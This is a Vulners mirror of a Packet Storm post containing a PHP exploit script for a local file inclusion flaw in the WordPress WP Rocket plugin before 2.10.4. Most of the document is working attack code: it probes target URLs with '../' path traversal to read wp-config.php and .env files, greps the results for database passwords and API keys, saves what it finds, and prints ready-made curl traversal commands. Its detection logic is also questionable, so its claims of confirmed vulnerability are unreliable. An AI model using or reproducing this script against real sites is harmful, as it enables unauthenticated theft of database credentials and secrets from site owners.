Vulners
Lucene search
π WordPress WP Rocket 2.10.3 LFI Vulnerability Scanner
ποΈΒ 06 Feb 2026Β 00:00:00Reported byΒ indoushkaTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 119Β Views
=============================================================================================================================================
| # Title : WordPress WP Rocket 2.10.3 LFI Vulnerability Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/search/Rocket+Plugin/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/175645/
[+] Summary :
a Local File Inclusion (LFI) vulnerability in WP Rocket Plugin versions prior to 2.10.4.
The vulnerability allows unauthenticated attackers to read sensitive files from the web server,
potentially exposing database credentials, configuration files, and other critical system information.
[+] POC :
# Full Scan
php poc.php -u https://example.com
# Generate curl commands for manual testing
php poc.php -u https://example.com --curl
---
#!/usr/bin/env php
<?php
/**
* WP Rocket Plugin Local File Inclusion Vulnerability Scanner
* CVE: WPVDB-ID:5484D821-7017-47A8-90D8-7D87CB5E0E50
* Author: indoushka
* Vulnerable Versions: WP Rocket < 2.10.4
*/
class WPRocketLFIScanner {
private $target;
private $user_agent;
public function __construct($target_url) {
$this->target = rtrim($target_url, '/');
$this->user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
}
public function check_wp_rocket_version() {
echo "[*] Checking WP Rocket version...\n";
$version_url = $this->target . "/wp-rocket/css/rocket.css";
try {
$context = stream_context_create([
'http' => [
'method' => 'GET',
'header' => "User-Agent: {$this->user_agent}\r\n",
'timeout' => 10
]
]);
$response = @file_get_contents($version_url, false, $context);
if ($response !== false) {
// Check headers for version information
$headers = $http_response_header;
foreach ($headers as $header) {
if (stripos($header, 'X-Powered-By') !== false && stripos($header, 'WP Rocket') !== false) {
$version = explode('/', $header);
if (isset($version[1])) {
return trim($version[1]);
}
}
}
// Alternative method: check file content
if (preg_match('/WP Rocket\s+([\d\.]+)/i', $response, $matches)) {
return $matches[1];
}
}
// Try alternative detection methods
return $this->alternative_version_detection();
} catch (Exception $e) {
echo "[-] Error checking version: " . $e->getMessage() . "\n";
}
return null;
}
private function alternative_version_detection() {
echo "[*] Trying alternative version detection methods...\n";
$paths = [
'/wp-content/plugins/wp-rocket/readme.txt',
'/wp-content/plugins/wp-rocket/wp-rocket.php',
'/wp-rocket/readme.txt'
];
foreach ($paths as $path) {
$url = $this->target . $path;
try {
$context = stream_context_create([
'http' => [
'method' => 'GET',
'header' => "User-Agent: {$this->user_agent}\r\n",
'timeout' => 5
]
]);
$content = @file_get_contents($url, false, $context);
if ($content !== false) {
// Extract version from readme
if (preg_match('/Stable tag:\s*([\d\.]+)/i', $content, $matches)) {
return $matches[1];
}
// Extract version from plugin header
if (preg_match('/Version:\s*([\d\.]+)/i', $content, $matches)) {
return $matches[1];
}
}
} catch (Exception $e) {
// Continue to next path
}
}
return null;
}
public function test_lfi_vulnerability() {
echo "[*] Testing for LFI vulnerability...\n";
$lfi_paths = [
'/wp-rocket/inc/vendor/composer/installed.json',
'/wp-content/plugins/wp-rocket/inc/vendor/composer/installed.json',
'/wp-rocket/vendor/composer/installed.json'
];
$sensitive_files = [
'/../../../../wp-config.php',
'/../../../../../wp-config.php',
'/../../../../../../wp-config.php',
'/../wp-config.php'
];
foreach ($lfi_paths as $lfi_path) {
$url = $this->target . $lfi_path;
echo "[*] Testing path: {$lfi_path}\n";
try {
$context = stream_context_create([
'http' => [
'method' => 'GET',
'header' => "User-Agent: {$this->user_agent}\r\n",
'timeout' => 10
]
]);
$response = @file_get_contents($url, false, $context);
if ($response !== false) {
// Check if we got a valid JSON response (composer file)
if (strpos($response, 'packages') !== false || strpos($response, 'dev') !== false) {
echo "[+] LFI vulnerability confirmed: {$lfi_path}\n";
// Now try to read sensitive files
$this->test_sensitive_files($lfi_path);
return true;
}
}
} catch (Exception $e) {
echo "[-] Error testing LFI path {$lfi_path}: " . $e->getMessage() . "\n";
}
}
return false;
}
private function test_sensitive_files($base_path) {
echo "[*] Attempting to read sensitive files...\n";
$sensitive_files = [
'wp-config.php' => [
'/../../../../wp-config.php',
'/../../../../../wp-config.php',
'/../../../../../../wp-config.php'
],
'.env' => [
'/../../../../.env',
'/../../../../../.env'
],
'wp-config.php in parent' => [
'/../wp-config.php'
]
];
foreach ($sensitive_files as $file_type => $paths) {
foreach ($paths as $path) {
$test_url = $this->target . dirname($base_path) . $path;
echo "[*] Trying to read: {$file_type} via {$path}\n";
try {
$context = stream_context_create([
'http' => [
'method' => 'GET',
'header' => "User-Agent: {$this->user_agent}\r\n",
'timeout' => 5
]
]);
$content = @file_get_contents($test_url, false, $context);
if ($content !== false) {
// Check for common patterns in sensitive files
if ($this->is_sensitive_content($content, $file_type)) {
echo "[+] SUCCESS: Retrieved {$file_type} content!\n";
echo "=" . str_repeat("=", 60) . "\n";
echo substr($content, 0, 1000) . "\n"; // First 1000 chars
echo "=" . str_repeat("=", 60) . "\n";
// Save to file
$filename = "wp_rocket_lfi_{$file_type}_" . time() . ".txt";
file_put_contents($filename, $content);
echo "[+] Content saved to: {$filename}\n";
}
}
} catch (Exception $e) {
// Continue to next path
}
}
}
}
private function is_sensitive_content($content, $file_type) {
$indicators = [
'wp-config.php' => ['DB_NAME', 'DB_USER', 'DB_PASSWORD', 'DB_HOST', 'AUTH_KEY'],
'.env' => ['DB_', 'DATABASE_', 'API_KEY', 'SECRET_'],
];
if (isset($indicators[$file_type])) {
foreach ($indicators[$file_type] as $indicator) {
if (stripos($content, $indicator) !== false) {
return true;
}
}
}
return false;
}
public function comprehensive_scan() {
$banner = "
βββββββ ββββββββββ βββββββ βββ ββββββββββββββ ββββββ βββ ββββββ
ββββββββ βββββββββββββββββββββββ ββββββββββββββ ββββββ ββββββββββββ
βββββββββ βββββ ββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββββββββββββββββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββ βββββββββββββββββββββββββββββββββββββββββββ ββββββ ββββββ βββ
ββββββ ββββββββββββ βββββββ βββββββ βββββββββββ ββββββ ββββββ βββ
WP Rocket LFI Vulnerability Scanner
By: indoushka
";
echo $banner . "\n";
echo "[*] Target: " . $this->target . "\n";
echo str_repeat("-", 60) . "\n";
// Check WP Rocket version
$version = $this->check_wp_rocket_version();
if ($version) {
echo "[+] WP Rocket Version Detected: " . $version . "\n";
$vulnerable_versions = ['2.10.0', '2.10.1', '2.10.2', '2.10.3'];
if (in_array($version, $vulnerable_versions)) {
echo "[!] Version is VULNERABLE to LFI\n";
// Test LFI vulnerability
if ($this->test_lfi_vulnerability()) {
echo "\n[!] CRITICAL: LFI vulnerability confirmed!\n";
echo "[!] Attackers can read sensitive files including wp-config.php\n";
} else {
echo "[-] LFI vulnerability not confirmed (may be patched or blocked)\n";
}
} else {
echo "[+] Version appears to be patched or not vulnerable\n";
}
} else {
echo "[-] WP Rocket not detected or version could not be determined\n";
echo "[*] Testing for LFI vulnerability anyway...\n";
$this->test_lfi_vulnerability();
}
echo "\n" . str_repeat("=", 60) . "\n";
echo "[*] Scan completed\n";
}
public function generate_curl_commands() {
echo "\n[+] Manual Testing Commands:\n";
echo str_repeat("-", 40) . "\n";
$paths = [
'/wp-rocket/inc/vendor/composer/installed.json',
'/wp-content/plugins/wp-rocket/inc/vendor/composer/installed.json'
];
foreach ($paths as $path) {
echo "curl -k '{$this->target}{$path}'\n";
}
echo "\n[+] Try reading wp-config.php:\n";
$base = '/wp-rocket/inc/vendor/composer';
echo "curl -k '{$this->target}{$base}/../../../../wp-config.php'\n";
echo "curl -k '{$this->target}{$base}/../../../../../wp-config.php'\n";
}
}
// Command line interface
if (php_sapi_name() === 'cli') {
$options = getopt("u:ch", ["url:", "curl", "help"]);
if (isset($options['h']) || isset($options['help']) || !isset($options['u'])) {
echo "Usage: php wp_rocket_lfi.php -u <target_url> [options]\n";
echo "Options:\n";
echo " -u, --url Target URL (required)\n";
echo " -c, --curl Generate curl commands for manual testing\n";
echo " -h, --help Show this help message\n";
echo "\nExample:\n";
echo " php wp_rocket_lfi.php -u https://example.com\n";
echo " php wp_rocket_lfi.php -u https://example.com --curl\n";
exit(1);
}
$target = $options['u'];
$scanner = new WPRocketLFIScanner($target);
if (isset($options['c']) || isset($options['curl'])) {
$scanner->generate_curl_commands();
} else {
$scanner->comprehensive_scan();
}
} else {
// Web interface
if (isset($_GET['url'])) {
$target = $_GET['url'];
$scanner = new WPRocketLFIScanner($target);
$scanner->comprehensive_scan();
} else {
echo "<h1>WP Rocket LFI Scanner</h1>";
echo "<form method='GET'>";
echo "Target URL: <input type='text' name='url' size='50' placeholder='https://example.com'>";
echo "<input type='submit' value='Scan'>";
echo "</form>";
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Feb 2026 00:00Current
5.3Medium risk
Vulners AI Score5.3